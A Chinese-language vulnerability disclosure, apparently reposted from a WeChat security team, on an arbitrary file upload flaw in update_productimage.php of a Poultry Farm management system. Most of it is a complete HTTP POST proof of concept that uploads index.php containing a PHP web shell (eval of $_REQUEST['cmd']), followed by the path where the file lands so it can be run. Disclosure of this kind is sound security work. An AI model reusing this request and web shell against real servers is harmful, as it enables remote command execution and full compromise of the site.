1. 源码文件
/farm/update_productimage.php
在源码中可以观察到,后端处理上传文件时,并未对$image=$_FILES["imagename"]["name"];
做任何过滤,从而导致任意文件上传。具体逻辑和product.php中一致)
2. 漏洞复现
POST /RedcockFarm/farm/update_productimage.php?imageid=3 HTTP/1.1
Host: 192.168.70.139
Content-Length: 313
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.70.139
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6wpWB1MBCI6oPxFD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.70.139/RedcockFarm/farm/update_productimage.php?imageid=3
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8gjigr0om5m6aaqh840mch8iea
Connection: close
------WebKitFormBoundary6wpWB1MBCI6oPxFD
Content-Disposition: form-data; name="imagename"; filename="index.php"
Content-Type: image/jpeg
eval($_REQUEST['cmd']); @
------WebKitFormBoundary6wpWB1MBCI6oPxFD
Content-Disposition: form-data; name="submit"
------WebKitFormBoundary6wpWB1MBCI6oPxFD--
成功上传后,根据源码可知,文件被传送到了productimages/文件夹下(这是个坑,因为感觉原作者代码编写问题,文件上传路径并未统一,在项目根目录下并不存在这个文件夹),访问相对路径,查看文件是否能够被成功解析。
原文始发于微信公众号(蟹堡安全团队):Poultry Farm管理系统update_productimage.php 处存在任意文件上传
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论